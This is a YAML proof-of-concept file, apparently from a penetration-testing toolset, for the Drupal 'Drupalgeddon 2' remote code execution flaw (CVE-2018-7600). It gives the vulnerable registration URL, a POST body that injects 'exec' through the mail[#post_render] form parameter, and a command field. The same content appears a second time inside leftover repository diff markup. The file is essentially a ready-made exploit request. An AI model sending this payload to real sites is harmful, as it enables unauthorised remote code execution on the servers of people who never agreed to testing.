fire_penetration/shellcode-loader/poc/text.yaml

# @name: exmple.yaml
# @Author: recyvan
# @Date: 2024-4-1
# @information: Drupal Drupalgeddon 2 远程代码执行漏洞（CVE-2018-7600）

poc_url:
  - url : /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
User-Agent:
  - context: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
method:
  - method: POST
  - data: form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=
cmd:
  - cmd: 'yes'
-												入口文件是penetration_toolset.py

											
										
										
											10 months ago
+								# @name: exmple.yaml
 								# @Author: recyvan
 								# @Date: 2024-4-1
 								# @information: Drupal Drupalgeddon 2 远程代码执行漏洞（CVE-2018-7600）
 								poc_url:
 								  - url : /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
 								User-Agent:
 								  - context: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
 								method:
 								  - method: POST
 								  - data: form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=
 								cmd:
 								  - cmd: 'yes'